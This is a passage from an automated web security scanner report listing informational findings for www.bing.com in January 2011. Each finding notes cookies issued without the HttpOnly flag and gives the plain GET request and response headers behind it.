The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/healthy-cooking/r/151 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51707
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:15 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:16 GMT
Connection: close
Set-Cookie: _SS=SID=C18100C403AB4700AAFD75B59C0FBDDD; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1c459af2715848119a7e3c09ded2dd85; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

17.434. http://www.bing.com/shopping/makeup/c/4259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/makeup/c/4259

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/makeup/c/4259 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81823
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:42 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:43 GMT
Connection: close
Set-Cookie: _SS=SID=5FA465270473442F834AFBC0420AA035; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c78f39d7b1f8a41d483fe8915fb7f5047; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:44 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

17.435. http://www.bing.com/shopping/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16318
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:49 GMT
Connection: close
Set-Cookie: _SS=SID=24F36415AB2F4ACC97A8D69FEBC50EE4; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce9aae95052e74b3bb915721c523f685a; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

17.436. http://www.bing.com/shopping/swimwear/c/4503

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/swimwear/c/4503

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/swimwear/c/4503 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82370
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:30 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:31 GMT
Connection: close
Set-Cookie: _SS=SID=F36266FD84BF426991CE02A2CFF4A782; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c62852a01ec264ed0b807e0bd957f015d; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

17.437. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/valentines-day-gift-ideas/r/144

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/valentines-day-gift-ideas/r/144 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38935
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:14 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:15 GMT
Connection: close
Set-Cookie: _SS=SID=4A7020392DCB444D8DB76BCC0389EA0B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c77d64d3a6dd04333923fcc4e923d301a; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

17.438. http://www.bing.com/videos/browse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/browse?mkt=en-us&vid= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16423
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:22 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2D09A236B6E24F73B2FF4D79F9A09F8F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca44d79e193c249f0bbd1b7d6be21f3bc; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

17.439. http://www.bing.com/videos/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/challenge
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; _HOP=I=1&TS=1296407506

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:47 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=2&TS=1296407507; domain=.bing.com; path=/
Set-Cookie: _UR=OMW=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/


17.440. http://www.bing.com/videos/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:16 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296345136; domain=.bing.com; path=/
Set-Cookie: _SS=SID=CBF8869E7B494B8F8A49EA37CACDCF50; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/


17.441. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 69772
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:26 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:26 GMT
Connection: close
Set-Cookie: _SS=SID=AD764BCD76884B30A752348A7C436D27; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea69017aa2940ddbc58f461fcf7f67e; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.442. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 107914
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:16:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.547 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:54 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42007; domain=.bing.com; path=/videos
Set-Cookie: ocid=42007; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=FE632F9AB87C4452AFEDD763816ED419; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5525b056b9174877ae080754e0e2103b; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.443. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 105273
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:33 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:33 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42008; domain=.bing.com; path=/videos
Set-Cookie: ocid=42008; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=2A046439AE0C4BEAB039A3EF561EA0B8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf0337bd634414bfa98e57cfaca8fdb9c; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.444. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 76329
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.437 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:04 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42007; domain=.bing.com; path=/videos
Set-Cookie: ocid=42007; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=71398422999D4434A086293033409942; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c90f8b31c25db49fb9066aaa59d9cc4f4; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.445. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o?q=health+care&rel=msn&from=en-us_msnhp&form=msnrll&gt1=31036 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 110111
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:32 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.062 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:32 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=31036; domain=.bing.com; path=/videos
Set-Cookie: ocid=31036; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=B5B3B7F99F7E42BBBB4D99A3E9BD0689; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2caf34df9069e94b079e21d3eb6a21ddf2; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
